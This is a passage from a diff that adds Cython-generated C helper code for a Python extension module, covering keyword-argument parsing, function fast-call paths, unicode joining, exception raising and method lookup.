0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* PyUnicode_Unicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_Unicode(PyObject *obj) { + if (unlikely(obj == Py_None)) + obj = __pyx_kp_u_None; + return __Pyx_NewRef(obj); +} + +/* decode_c_string */ +static CYTHON_INLINE PyObject* __Pyx_decode_c_string( + const char* cstring, Py_ssize_t start, Py_ssize_t stop, + const char* encoding, const char* errors, + PyObject* (*decode_func)(const char *s, Py_ssize_t size, const char *errors)) { + Py_ssize_t length; + if (unlikely((start < 0) | (stop < 0))) { + size_t slen = strlen(cstring); + if (unlikely(slen > (size_t) PY_SSIZE_T_MAX)) { + PyErr_SetString(PyExc_OverflowError, + "c-string too long to convert to Python"); + return NULL; + } + length = (Py_ssize_t) slen; + if (start < 0) { + start += length; + if (start < 0) + start = 0; + } + if (stop < 0) + stop += length; + } + if (unlikely(stop <= start)) + return __Pyx_NewRef(__pyx_empty_unicode); + length = stop - start; + cstring += start; + if (decode_func) { + return decode_func(cstring, length, errors); + } else { + return PyUnicode_Decode(cstring, length, encoding, errors); + } +} + +/* JoinPyUnicode */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char) { +#if CYTHON_USE_UNICODE_INTERNALS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyObject *result_uval; + int result_ukind, kind_shift; + Py_ssize_t i, char_pos; + void *result_udata; + CYTHON_MAYBE_UNUSED_VAR(max_char); +#if CYTHON_PEP393_ENABLED + result_uval = PyUnicode_New(result_ulength, max_char); + if (unlikely(!result_uval)) return NULL; + result_ukind = (max_char <= 255) ? PyUnicode_1BYTE_KIND : (max_char <= 65535) ? PyUnicode_2BYTE_KIND : PyUnicode_4BYTE_KIND; + kind_shift = (result_ukind == PyUnicode_4BYTE_KIND) ? 2 : result_ukind - 1; + result_udata = PyUnicode_DATA(result_uval); +#else + result_uval = PyUnicode_FromUnicode(NULL, result_ulength); + if (unlikely(!result_uval)) return NULL; + result_ukind = sizeof(Py_UNICODE); + kind_shift = (result_ukind == 4) ? 2 : result_ukind - 1; + result_udata = PyUnicode_AS_UNICODE(result_uval); +#endif + assert(kind_shift == 2 || kind_shift == 1 || kind_shift == 0); + char_pos = 0; + for (i=0; i < value_count; i++) { + int ukind; + Py_ssize_t ulength; + void *udata; + PyObject *uval = PyTuple_GET_ITEM(value_tuple, i); + if (unlikely(__Pyx_PyUnicode_READY(uval))) + goto bad; + ulength = __Pyx_PyUnicode_GET_LENGTH(uval); + if (unlikely(!ulength)) + continue; + if (unlikely((PY_SSIZE_T_MAX >> kind_shift) - ulength < char_pos)) + goto overflow; + ukind = __Pyx_PyUnicode_KIND(uval); + udata = __Pyx_PyUnicode_DATA(uval); + if (!CYTHON_PEP393_ENABLED || ukind == result_ukind) { + memcpy((char *)result_udata + (char_pos << kind_shift), udata, (size_t) (ulength << kind_shift)); + } else { + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030300F0 || defined(_PyUnicode_FastCopyCharacters) + _PyUnicode_FastCopyCharacters(result_uval, char_pos, uval, 0, ulength); + #else + Py_ssize_t j; + for (j=0; j < ulength; j++) { + Py_UCS4 uchar = __Pyx_PyUnicode_READ(ukind, udata, j); + __Pyx_PyUnicode_WRITE(result_ukind, result_udata, char_pos+j, uchar); + } + #endif + } + char_pos += ulength; + } + return result_uval; +overflow: + PyErr_SetString(PyExc_OverflowError, "join() result is too long for a Python string"); +bad: + Py_DECREF(result_uval); + return NULL; +#else + CYTHON_UNUSED_VAR(max_char); + CYTHON_UNUSED_VAR(result_ulength); + CYTHON_UNUSED_VAR(value_count); + return PyUnicode_Join(__pyx_empty_unicode, value_tuple); +#endif +} + +/* ArgTypeTest */ +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact) +{ + __Pyx_TypeName type_name; + __Pyx_TypeName obj_type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + else if (exact) { + #if PY_MAJOR_VERSION == 2 + if ((type == &PyBaseString_Type) && likely(__Pyx_PyBaseString_CheckExact(obj))) return 1; + #endif + } + else { + if (likely(__Pyx_TypeCheck(obj, type))) return 1; + } + type_name = __Pyx_PyType_GetName(type); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "Argument '%.200s' has incorrect type (expected " __Pyx_FMT_TYPENAME + ", got " __Pyx_FMT_TYPENAME ")", name, type_name, obj_type_name); + __Pyx_DECREF_TypeName(type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* PyObjectCallNoArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { + PyObject *arg = NULL; + return __Pyx_PyObject_FastCall(func, (&arg)+1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* FixUpExtensionType */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { +#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API + CYTHON_UNUSED_VAR(spec); + CYTHON_UNUSED_VAR(type); +#else + const PyType_Slot *slot = spec->slots; + while (slot && slot->slot && slot->slot != Py_tp_members) + slot++; + if (slot && slot->slot == Py_tp_members) { + int changed = 0; +#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) + const +#endif + PyMemberDef *memb = (PyMemberDef*) slot->pfunc; + while (memb && memb->name) { + if (memb->name[0] == '_' && memb->name[1] == '_') { +#if PY_VERSION_HEX < 0x030900b1 + if (strcmp(memb->name, "__weaklistoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_weaklistoffset = memb->offset; + changed = 1; + } + else if (strcmp(memb->name, "__dictoffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); + type->tp_dictoffset = memb->offset; + changed = 1; + } +#if CYTHON_METH_FASTCALL + else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { + assert(memb->type == T_PYSSIZET); + assert(memb->flags == READONLY); +#if PY_VERSION_HEX >= 0x030800b4 + type->tp_vectorcall_offset = memb->offset; +#else + type->tp_print = (printfunc) memb->offset; +#endif + changed = 1; + } +#endif +#else + if ((0)); +#endif +#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON + else if (strcmp(memb->name, "__module__") == 0) { + PyObject *descr; + assert(memb->type == T_OBJECT); + assert(memb->flags == 0 || memb->flags == READONLY); + descr = PyDescr_NewMember(type, memb); + if (unlikely(!descr)) + return -1; + if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { + Py_DECREF(descr); + return -1; + } + Py_DECREF(descr); + changed = 1; + } +#endif + } + memb++; + } + if (changed) + PyType_Modified(type); + } +#endif + return 0; +} +#endif + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* PyObjectGetMethod */ +static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { + PyObject *attr; +#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP + __Pyx_TypeName type_name; + PyTypeObject *tp = Py_TYPE(obj); + PyObject *descr; + descrgetfunc f = NULL; + PyObject **dictptr, *dict; + int meth_found = 0; + assert (*method == NULL); + if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; + } + if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { + return 0; + } + descr = _PyType_Lookup(tp, name); + if (likely(descr != NULL)) { + Py_INCREF(descr); +#if defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR + if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) +#elif PY_MAJOR_VERSION >= 3 + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) + #endif +#else + #ifdef __Pyx_CyFunction_USED + if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) + #else + if (likely(PyFunction_Check(descr))) + #endif +#endif + { + meth_found = 1; + } else { + f = Py_TYPE(descr)->tp_descr_get; + if (f != NULL && PyDescr_IsData(descr)) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + } + } + dictptr = _PyObject_GetDictPtr(obj); + if (dictptr != NULL && (dict = *dictptr) != NULL) { + Py_INCREF(dict); + attr = __Pyx_PyDict_GetItemStr(dict, name); + if (attr != NULL) { + Py_INCREF(attr); + Py_DECREF(dict); + Py_XDECREF(descr); + goto try_unpack; + } + Py_DECREF(dict); + } + if (meth_found) { + *method = descr; + return 1; + } + if (f != NULL) { + attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); + Py_DECREF(descr); + goto try_unpack; + } + if (likely(descr != NULL)) { + *method = descr; + return 0; + } + type_name = __Pyx_PyType_GetName(tp); + PyErr_Format(PyExc_AttributeError, +#if PY_MAJOR_VERSION >= 3 + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", + type_name, name); +#else + "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", + type_name, PyString_AS_STRING(name)); +#endif + __Pyx_DECREF_TypeName(type_name); + return 0; +#else + attr = __Pyx_PyObject_GetAttrStr(obj, name); + goto try_unpack; +#endif +try_unpack: +#if CYTHON_UNPACK_METHODS + if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { + PyObject *function = PyMethod_GET_FUNCTION(attr); + 